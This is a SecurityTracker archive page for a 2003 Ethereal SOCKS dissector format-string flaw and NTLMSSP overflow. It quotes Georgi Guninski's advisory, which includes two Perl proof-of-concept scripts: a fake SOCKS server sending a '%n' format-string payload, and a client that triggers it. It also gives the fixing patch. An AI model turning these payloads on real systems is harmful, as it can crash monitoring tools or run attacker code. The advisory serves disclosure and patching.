SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Generic)  >   Wireshark Vendors:   Wireshark.org
Ethereal SOCKS Dissector Format String Flaw and NTLMSSP Overflow Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1006252
SecurityTracker URL:  http://securitytracker.com/id/1006252
CVE Reference:   CAN-2003-0081, CAN-2003-0159   (Links to External Site)
Updated:  Dec 8 2003
Original Entry Date:  Mar 8 2003
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): from 0.8.7 to 0.9.9
Description:   Two vulnerabilities were reported in the Ethereal network sniffer. A remote user may be able to cause the sniffer to crash or to execute arbitrary code.

Georgi Guninski reported that a format string flaw resides in 'packet-socks.c' in the proto_tree_add_text() function. User supplied input is provided to the format_text() function without the proper formatting string and without proper input validation.

A remote user can create a specially crafted SOCKS packet and send it to or via a network that is monitored by Ethereal to cause the Ethereal process to crash or execute arbitrary code.

A demonstration exploit is provided in the Source Message. The author's advisory is available at:

http://www.guninski.com/etherre.html

The vendor has also reported that the NTLMSSP code contains a heap overflow.

Impact:   A remote user may be able to cause the Ethereal process to crash or to execute arbitrary code.
Solution:   The vendor has released a fixed version (0.9.10), available at:

http://www.ethereal.com/download.html

Vendor URL:  www.ethereal.com/appnotes/enpa-sa-00008.html (Links to External Site)
Cause:   Boundary error, Input validation error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Debian Issues Fix) Ethereal SOCKS Dissector Format String Flaw Lets Remote Users Execute Arbitrary Code   (joey@infodrom.org (Martin Schulze))
Debian has released a fix.
(Red Hat Issues Fix) Ethereal SOCKS Dissector Format String Flaw and NTLMSSP Overflow Let Remote Users Execute Arbitrary Code   (bugzilla@redhat.com)
Red Hat has released a fix.



 Source Message Contents

Date:  Sat, 08 Mar 2003 15:57:45 +0200
Subject:  [Full-Disclosure] Ethereal format string bug, yet still ethereal much better than windows


Georgi Guninski security advisory #60, 2003

Ethereal format string bug, yet still ethereal much better than windows

Systems affected:
Ethereal < 0.9.10
Fixed in 0.9.10


Risk: Medium
Date: 8 March 2003

Legal Notice:
This Advisory is Copyright (c) 2003 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission - this especially applies to
so called "vulnerabilities databases" and securityfocus, microsoft, cert
and mitre.
If you want to link to this content use the URL:
http://www.guninski.com/etherre.html
Anything in this document may change without notice.

Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or  indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Description:
Ethereal is a sniffer. According to www.ethereal.com its purpose is:
"Sniffing the glue that holds the Internet together"
There is format string bug in it which is confirmed to be a DoS and
probably can lead to execution of code (the difficulty comes from the fact
that some characters are escaped)

Details:
The problem seems to be in: "packet-socks.c" line 910 of 1180
-----
     proto_tree_add_text( tree, tvb, offset, linelen,
          		                	format_text(data, linelen));
------
The format mask is missing.
How to reproduce on localhost:

start raw3sv.pl (dummy socks server, attached)
start ethereal on loopback, update packets in real time.
start sockcl.pl (attached, does socks ping, without argument connects to
localhost)
wait about 5 seconds.
go to ethereal and select the line "Sock5.....Ping Req Results"
result: SEGV.

---raw3sv.pl----
#!/usr/bin/perl
# Written by Georgi Guninski
use IO::Socket;
use str1ct;
#local port
my $port = 1080;

#redirect to

my $msg="\x05\x00";
my $repl="\x05\x00\x00\x00\x02aa";

my $pi="m\$sux\%x\%x\%x\%n";


my $server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, 
Reuse => 1, Listen => 2)
or die "Couldn't create tcp-server.\n";

print "Dummy socks server for ethereal\nListening on localhost:${port}\n";

my $client;
while ($client = $server->accept()) {
  print "Client connected.\n";
  print "Sending...";
  sleep(1);
#	while(<$client>) {print $_;}
  print $client "$msg";
  print "OK\n";
  sleep(1);
  print $client "$repl";
  sleep(1);
  print $client "$pi";
  close($client);
  exit(0);
}
----------------

----sockcl.pl------------
#!/usr/bin/perl -w
# Written by Georgi Guninski
use IO::Socket;
use str1ct;
my $host= $ARGV[0] || "localhost";
my $port=1080;

print "host=${host}\n";

my $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => 
"TCP") || die("Unable to connect");

print "Start\n";

my $logcmd="\x05\x00\x00";
my $pingcmd="\x05\x80\x00\x01\x01\x01\x01\x01\x01\x01";

print $socket $logcmd;
my $x;
sysread($socket,$x,2);
#sleep(1);
print $socket $pingcmd;
sleep(5);

print "Done\n";
----------------


Workaround/Solution:
Upgrade to 0.9.10 or apply the following patch:
------------------
--- packet-socks.c.orig	2002-08-29 03:40:03.000000000 +0300
+++ packet-socks.c	2003-02-25 15:52:14.000000000 +0200
@@ -908,7 +908,7 @@
                   		linelen = lineend - data;

          		                proto_tree_add_text( tree, tvb, offset, linelen,
-       		                	format_text(data, linelen));
+       		                	"%s",format_text(data, linelen));
                  		        offset += linelen;
                          		data = lineend;
                          	}
------------------

Vendor status:
Notified on Tue, 25 Feb 2003
http://www.ethereal.com/appnotes/enpa-sa-00008.html


btw, happy 8 March to the women.

Regards,
Georgi Guninski
http://www.guninski.com



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC